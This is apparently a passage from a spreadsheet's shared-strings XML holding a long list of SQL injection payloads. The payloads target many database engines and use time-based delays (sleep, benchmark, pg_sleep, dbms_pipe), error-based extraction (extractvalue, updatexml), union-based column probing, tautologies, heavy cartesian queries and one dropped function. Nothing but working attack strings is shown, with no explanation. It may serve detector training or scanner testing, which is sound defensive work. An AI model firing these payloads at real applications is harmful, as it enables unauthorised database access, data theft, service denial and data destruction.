    <t>1"  )  )   as mlid where 1047 = 1047 union all select null,null#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 9856 = 9856 )  then sleep ( 5 )  else 9856* ( select 9856 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>1" and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and "nzgn" = "nzgn</t>
  </si>
  <si>
    <t>1%" or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and "%" = "</t>
  </si>
  <si>
    <t>-1244 )  as qszw where 2332 = 2332 union all select 2332,2332,2332,2332#</t>
  </si>
  <si>
    <t>-5962  )  )   as jbqv where 2583 = 2583 or 7496 = 8560--</t>
  </si>
  <si>
    <t>1%"  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  5524 = 5524</t>
  </si>
  <si>
    <t>1'|| ( select 'ymez' from dual where 9870 = 9870 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1 where 6223 = 6223 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( 'vgkt' = 'vgkt</t>
  </si>
  <si>
    <t>1 )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( 8898 = 8898</t>
  </si>
  <si>
    <t>-4607'|| ( select 'wkdg' where 7524 = 7524 order by 1--</t>
  </si>
  <si>
    <t>1 )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'ofko' = 'ofko</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 9263 = 9263 )  then 1 else 9263* ( select 9263 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>1" )  as zhlf where 4119 = 4119 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1 )  as estm where 4809 = 4809 union all select null,null,null--</t>
  </si>
  <si>
    <t>if ( 8537 = 7034 )  select 8537 else drop function vqmp--</t>
  </si>
  <si>
    <t>1 where 4641 = 4641</t>
  </si>
  <si>
    <t>-7584' union all select 1132,1132,1132,1132,1132,1132,1132,1132,1132,1132#</t>
  </si>
  <si>
    <t xml:space="preserve">select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )  </t>
  </si>
  <si>
    <t>1' )  and make_set ( 8403 = 8403,8899 )  and  ( 'ojag' = 'ojag</t>
  </si>
  <si>
    <t>1"  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( "epfg" like "epfg</t>
  </si>
  <si>
    <t>1'+ ( select ohqr where 5610 = 5610</t>
  </si>
  <si>
    <t>1"  )  )   as ljhz where 2416 = 2416</t>
  </si>
  <si>
    <t>-9564 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 )</t>
  </si>
  <si>
    <t xml:space="preserve"> ( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 7992 = 7992 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  </t>
  </si>
  <si>
    <t>1%' and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and '%' = '</t>
  </si>
  <si>
    <t>1' )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( 'pmzp' like 'pmzp</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and  ( 'hhlq' like 'hhlq</t>
  </si>
  <si>
    <t>1'+ ( select 'arzm' where 6464 = 6464 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   ) +'</t>
  </si>
  <si>
    <t>1'|| ( select 'qsgi' where 1707 = 1707 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>-2920"  )  )   as zdgv where 9702 = 9702 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 1</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   as vwua where 8099 = 8099 union all select null--</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 7616 = 7616 )  then 1 else 1/ ( select 0 )  end  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( 'rlux' like 'rlux</t>
  </si>
  <si>
    <t>1' )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 'zpzf' = 'zpzf</t>
  </si>
  <si>
    <t>1' )  as xiqw where 8507 = 8507 rlike sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1" where 3678 = 3678 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1" )  where 9447 = 9447</t>
  </si>
  <si>
    <t>1"  )  )   as ufba where 4049 = 4049</t>
  </si>
  <si>
    <t>1%' or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>-2307'  )  )   )  or 6872 = 6872 and   (  (   ( 'fyok' like 'fyok</t>
  </si>
  <si>
    <t>1 )  as cwsi where 7360 = 7360 or sleep ( 5 ) #</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 6581 = 6581 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual ) </t>
  </si>
  <si>
    <t>-4557 or 6872 = 6872-- kkte</t>
  </si>
  <si>
    <t>1"  )  )   and 7533 = 7533 and   (  (  "rnni" like "rnni</t>
  </si>
  <si>
    <t>-5616"  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +ch</t>
  </si>
  <si>
    <t>1'+ ( select kqac where 4362 = 4362 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  "weku" like "weku</t>
  </si>
  <si>
    <t>1%" )  and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1' )  as dvoy where 7906 = 7906 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 'ujjr' = 'ujjr</t>
  </si>
  <si>
    <t>-5204" )  union all select 7186,7186,7186--</t>
  </si>
  <si>
    <t>-9440" union all select 5599,5599,5599,5599,5599--</t>
  </si>
  <si>
    <t>1  )  )   as cusv where 4871 = 4871 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1" )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "rrbl" = "rrbl</t>
  </si>
  <si>
    <t>1'  )  )   as kdse where 6767 = 6767 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  'czqk' like 'czqk</t>
  </si>
  <si>
    <t>1" and sleep ( 5 )  and "tdid" like "tdid</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1%"  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 or sleep ( 5 ) # tdgb</t>
  </si>
  <si>
    <t>select  ( case when  ( 1499 = 4923 )  then 1499 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>-1510" )  as rqrv where 4507 = 4507 union all select 4507,4507,4507,4507,4507--</t>
  </si>
  <si>
    <t>-1277'  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>-4305  )  )   )  union all select 2401,2401--</t>
  </si>
  <si>
    <t xml:space="preserve">-6519'  )  )   as tdlt where 5040 = 5040 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( </t>
  </si>
  <si>
    <t>1%" and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-7758%'  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>1%'  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1%" and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and "%" = "</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  "gydr" like "gydr</t>
  </si>
  <si>
    <t>-7941 or  ( 5822 = 8754 ) *8754-- eepn</t>
  </si>
  <si>
    <t xml:space="preserve">1" and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t>1"  )  )   as brwj where 9180 = 9180</t>
  </si>
  <si>
    <t>1%"  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select 'nlvq' where 7528 = 7528 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t xml:space="preserve">1' or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (  "xeki" like "xeki</t>
  </si>
  <si>
    <t>-1617%" or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )</t>
  </si>
  <si>
    <t>1' )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( 'nond' = 'nond</t>
  </si>
  <si>
    <t>1" )  where 7165 = 7165 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )  --</t>
  </si>
  <si>
    <t>1%" )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-5774' where 3632 = 3632 or  ( 3177 = 4222 ) *4222--</t>
  </si>
  <si>
    <t>1 )  as zzip where 5353 = 5353 and 3394 = 3092</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-3431%' )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>1' )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and  ( 'ffzv' = 'ffzv</t>
  </si>
  <si>
    <t xml:space="preserve">elt ( 5953 = 5953,1 ) </t>
  </si>
  <si>
    <t>-8902 union all select 4339,4339,4339#</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (   ( 'xobx' = 'xobx</t>
  </si>
  <si>
    <t>select  ( case when  ( 7217 = 7631 )  then 7217 else 7217* ( select 7217 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-8080" )  as nlos where 8917 = 8917 union all select 8917,8917,8917,8917--</t>
  </si>
  <si>
    <t>-4856' in boolean mode )  union all select 1074,1074,1074,1074,1074,1074,1074#</t>
  </si>
  <si>
    <t>1  )  )   )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'|| ( select 'cjwp' where 8681 = 8681 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   ) ||'</t>
  </si>
  <si>
    <t>1'+ ( select 'zirh' where 9054 = 9054 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   ) +'</t>
  </si>
  <si>
    <t>-5700 where 4238 = 4238 union all select 4238,4238,4238#</t>
  </si>
  <si>
    <t>1" )  where 1673 = 1673 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>-7884" where 3297 = 3297 or 2492 = 6158</t>
  </si>
  <si>
    <t>1'+ ( select qdon where 9453 = 9453</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and "%" = "</t>
  </si>
  <si>
    <t>1" )  where 3404 = 3404 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-1036' )  or 6872 = 6872 and  ( 'wvbi' = 'wvbi</t>
  </si>
  <si>
    <t>1'+ ( select mavu where 4276 = 4276 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1%' or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1 )  where 1443 = 1443 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%"  )  )   and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-3088' or 6872 = 6872 and 'miwk' = 'miwk</t>
  </si>
  <si>
    <t>-1765' )  order by 1--</t>
  </si>
  <si>
    <t>1%" )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1%' )  and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>1"  )  )   and make_set ( 1167 = 5027,5027 )  and   (  (  "grfi" = "grfi</t>
  </si>
  <si>
    <t>1%'  )  )   or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1'  )  )   or sleep ( 5 )  and   (  (  'uzhd' like 'uzhd</t>
  </si>
  <si>
    <t>1"  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  "imlq" like "imlq</t>
  </si>
  <si>
    <t>1' )  where 6244 = 6244 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>1 )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 5468 = 5468</t>
  </si>
  <si>
    <t>-5520%" union all select 5235,5235,5235,5235,5235,5235,5235,5235,5235,5235--</t>
  </si>
  <si>
    <t>select  ( case when  ( 3863 = 1151 )  then 3863 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>-3971%'  )  )   )  or elt ( 1032 = 1032,3623 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-4588" union all select 4550,4550,4550,4550#</t>
  </si>
  <si>
    <t>1'+ ( select dklk where 9862 = 9862 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1'+ ( select 'idmr' where 5029 = 5029 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1%" ) </t>
  </si>
  <si>
    <t>-7267 )  union all select 1912,1912,1912,1912,1912,1912,1912,1912--</t>
  </si>
  <si>
    <t>-5575" union all select 8665,8665,8665,8665,8665,8665,8665--</t>
  </si>
  <si>
    <t>1 where 5929 = 5929 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) </t>
  </si>
  <si>
    <t>1'+ ( select afst where 7454 = 7454 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) +'</t>
  </si>
  <si>
    <t>1" )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( "igop" = "igop</t>
  </si>
  <si>
    <t>1"  )  )   as kmss where 3214 = 3214 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'scye' like 'scye</t>
  </si>
  <si>
    <t>-8963 )  where 8528 = 8528 or  ( 2470 = 3271 ) *3271--</t>
  </si>
  <si>
    <t>1'|| ( select 'gved' from dual where 6965 = 6965</t>
  </si>
  <si>
    <t>1'+ ( select 'hcqf' where 9956 = 9956 and  ( 2993 = 4297 ) *4297 ) +'</t>
  </si>
  <si>
    <t>1"  )  )   )  or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1'  )  )   as mbzk where 9153 = 9153 and 2006 = 2006</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1' )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( 'xgzb' = 'xgzb</t>
  </si>
  <si>
    <t>-5891 union all select 7103,7103,7103,7103--</t>
  </si>
  <si>
    <t>1" where 2035 = 2035 and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )  --</t>
  </si>
  <si>
    <t>1 )  as attr where 8085 = 8085 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 9041 = 6421,6421 )  and   (  (   ( 'ixxg' like 'ixxg</t>
  </si>
  <si>
    <t>1  )  )   as kycl where 8008 = 8008 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-6561"  )  )   )  or 6872 = 6872 and   (  (   ( "azqp" like "azqp</t>
  </si>
  <si>
    <t>-1083' )  union all select 9993,9993,9993,9993,9993,9993,9993,9993,9993--</t>
  </si>
  <si>
    <t>1' )  where 8211 = 8211 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1' )  as eymt where 3911 = 3911 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1',extractvalue ( 9788,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 9788 = 9788,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t>1%' and 7533 = 7533 and '%' = '</t>
  </si>
  <si>
    <t>-2314%'  )  )   union all select 4612,4612--</t>
  </si>
  <si>
    <t>1"  )  )   )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (   ( "ijag" = "ijag</t>
  </si>
  <si>
    <t>1'|| ( select 'omeg' from dual where 4751 = 4751</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( 'cimm' like 'cimm</t>
  </si>
  <si>
    <t>1%' union all select null,null,null#</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  rlike  ( select  ( case when  ( 8488 = 1270 )  then 1 else 0x28 end  )  )  </t>
  </si>
  <si>
    <t>1 and sleep ( 5 ) -- ruuv</t>
  </si>
  <si>
    <t>1"  )  )   as eglv where 7412 = 7412 union all select null#</t>
  </si>
  <si>
    <t>1" )  where 3122 = 3122 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 )  where 9860 = 9860 and 4443 = 4111--</t>
  </si>
  <si>
    <t>1 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) # fzni</t>
  </si>
  <si>
    <t>1'|| ( select 'epjf' from dual where 8584 = 8584 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>select  ( case when  ( 8403 = 7151 )  then 8403 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1" )  as eibf where 5026 = 5026 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>1%' or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and '%' = '</t>
  </si>
  <si>
    <t>select case when 2599 = 7035 then 1 else null end--</t>
  </si>
  <si>
    <t>1' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'jjxn' = 'jjxn</t>
  </si>
  <si>
    <t>1' where 6795 = 6795 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' )  as upgb where 2031 = 2031</t>
  </si>
  <si>
    <t>1  )  )   )  and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-6680"  )  )   )  union all select 2564,2564,2564,2564,2564,2564#</t>
  </si>
  <si>
    <t>1" )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-6076"  )  )   or 8277 = 4757</t>
  </si>
  <si>
    <t>1' )  as lewd where 3118 = 3118 order by 1--</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (  'eqoc' like 'eqoc</t>
  </si>
  <si>
    <t>1'|| ( select 'hvqw' from dual where 4423 = 4423 union all select null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) </t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-1425" )  where 8056 = 8056 or elt ( 1032 = 1032,3623 ) --</t>
  </si>
  <si>
    <t>1'  )  )   and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (  'wevl' = 'wevl</t>
  </si>
  <si>
    <t>1" )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   and 2006 = 2006</t>
  </si>
  <si>
    <t>-6388'+ ( select 'jqld' where 8600 = 8600 union all select 8600,8600#</t>
  </si>
  <si>
    <t>1 )  where 7026 = 7026</t>
  </si>
  <si>
    <t>-1890'  )  )   )  or 8526 = 1389 and   (  (   ( 'ecgt' = 'ecgt</t>
  </si>
  <si>
    <t>1' or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and 'dogx' = 'dogx</t>
  </si>
  <si>
    <t>1 )  as qjbd where 2808 = 2808  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>1 )  where 9338 = 9338 or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  --</t>
  </si>
  <si>
